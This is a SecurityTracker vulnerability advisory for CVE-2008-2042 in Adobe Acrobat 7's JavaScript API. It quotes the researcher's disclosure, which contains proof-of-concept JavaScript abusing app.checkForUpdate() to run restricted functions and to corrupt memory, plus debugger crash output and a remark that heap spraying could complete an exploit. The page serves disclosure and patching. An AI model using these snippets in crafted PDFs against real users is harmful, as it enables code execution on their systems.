SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Adobe Acrobat/Reader Vendors:   Adobe Systems Incorporated
Adobe Acrobat Javascript API app.checkForUpdate() Function Lets Remote Users Execute Restricted Functions
SecurityTracker Alert ID:  1019971
SecurityTracker URL:  http://securitytracker.com/id/1019971
CVE Reference:   CVE-2008-2042   (Links to External Site)
Date:  May 7 2008
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 7.1.0
Description:   A vulnerability was reported in Adobe Acrobat and Adobe Reader. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a PDF file containing specially crafted javascript that, when loaded by the target user, will invoke the Javascript API app.checkForUpdate() function. This function allows the remote user to execute restricted functions and execute arbitrary code.

Adobe Reader and Adobe Acrobat version 8.x are not affected.

The vendor was notified on November 2, 2007.

cocoruder reported this vulnerability.

Impact:   A remote user can create a PDF file that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:   The vendor has issued a fixed version (7.1.0), available at:

http://www.adobe.com/go/getreader

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb08-13.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb08-13.html (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 27 2008 (Sun Issues Advisory) Adobe Acrobat Javascript API app.checkForUpdate() Function Lets Remote Users Execute Restricted Functions
Sun is working on a fix for Solaris 10.



 Source Message Contents

Date:  Wed, 7 May 2008 09:35:50 +0800
Subject:  [Full-disclosure] Adobe Acrobat Professional Javascript For PDF

Adobe Acrobat Professional Javascript For PDF Security Feature Bypass
and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

    Two critical vulnerabilities exist in the javascript API of Adobe
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
codes on the affected system.


Affected Software Versions:

    Adobe Acrobat Professional 7.0.9



Details:

    These two vulnerabilities specially exist in an unpublicized
fucntion called "app.checkForUpdate()", which are exploited through a
callback function.

    Following is the POC for how to execute restricted functions:

	function	myCallBack()
	{
		app.alert("It will call app.newDoc()");
		app.newDoc();
		app.alert("function has been called");
	}

	app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});


    As we know, when we call "app.newDoc()" normally, the function can
not be executed because of the security feature of PDF's javascript,
but the above code can still execute this function successfully, other
restricted functions can also be executed by exploiting this
vulnerability.

    The POC for triggering the memory corruption vulnerability:

	function	myCallBack()
	{
		app.alert("Corrupting the memory");

		// Open a new report will corrupt the memory
		var rep = new Report();

		app.alert("If the application has not been crashed, try to close the
application and then you will get it.");
	}

	app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});


    When we call the function "new Report()"(other functions maybe
useful too) in the function "Callback", it will corrupt the memory.
Debug informations from Windbg as follows:

	First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
	eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0         nv up ei pl nz na po nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl          ds:0023:00000040=??
	0:000> u eip
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl
	10101012 6c              ins     byte ptr es:[edi],dx
	10101013 0000            add     byte ptr [eax],al
	10101015 1b640000        sbb     esp,dword ptr [eax+eax]
	10101019 336000          xor     esp,dword ptr [eax]
	1010101c 0033            add     byte ptr [ebx],dh
	1010101e 60              pushad
	1010101f 0000            add     byte ptr [eax],al

    It is running codes at an unexpected address.

    Using the heap spray technology of javascript in PDF can develop a
working exploit for this vulnerability easily.

    Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe
Reader/Acrobat 8.



Solution:

    Adobe has released an advisory for this vulnerability which is available on:

    http://www.adobe.com/support/security/bulletins/apsb08-13.html

    Fortinet advisory can be found at:

    http://www.fortiguardcenter.com



CVE Information:

    CVE-2008-2042



Disclosure Timeline:

    2007.11.01        Vendor notified via email
    2007.11.02        Vendor responded
    2008.05.06        Coordinated public disclosure		



--EOF--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC